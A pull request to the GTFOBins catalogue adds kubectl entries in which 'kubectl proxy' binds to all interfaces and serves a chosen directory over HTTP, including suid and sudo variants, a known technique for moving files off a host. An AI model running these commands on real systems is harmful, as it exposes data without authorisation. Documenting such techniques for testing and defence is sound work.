### PR TITLE
Adding kubectl for file upload

### DIFF
--- a/_gtfobins/kubectl.md
+++ b/_gtfobins/kubectl.md
@@ -1,6 +1,16 @@
 ---
+description: It serves files from a specified directory via HTTP, i.e., `http://<IP>:4444/x/<file>`.
 functions:
   file-upload:
-    - description: create HTTP server to upload files from a directory
-      code: kubectl proxy --address=0.0.0.0 --www=/tmp/ --www-prefix=/tmp/
+    - code: |
+        LFILE=dir_to_serve
+        kubectl proxy --address=0.0.0.0 --port=4444 --www=$LFILE --www-prefix=/x/
+  suid:
+    - code: |
+        LFILE=dir_to_serve
+        ./kubectl proxy --address=0.0.0.0 --port=4444 --www=$LFILE --www-prefix=/x/
+  sudo:
+    - code: |
+        LFILE=dir_to_serve
+        sudo kubectl proxy --address=0.0.0.0 --port=4444 --www=$LFILE --www-prefix=/x/
 ---

--- a/_gtfobins/kubectl.md
+++ b/_gtfobins/kubectl.md
@@ -1,0 +1,6 @@
+---
+functions:
+  file-upload:
+    - description: create HTTP server to upload files from a directory
+      code: kubectl proxy --address=0.0.0.0 --www=/tmp/ --www-prefix=/tmp/
+---


### PR DESCRIPTION
This PR contains the example usage on how to leverage kubectl for file upload capabilities. 
Example content can be seen [here](https://www.lacework.com/blog/kubernetes-tools-are-helpful-for-your-team-and-your-attacker/).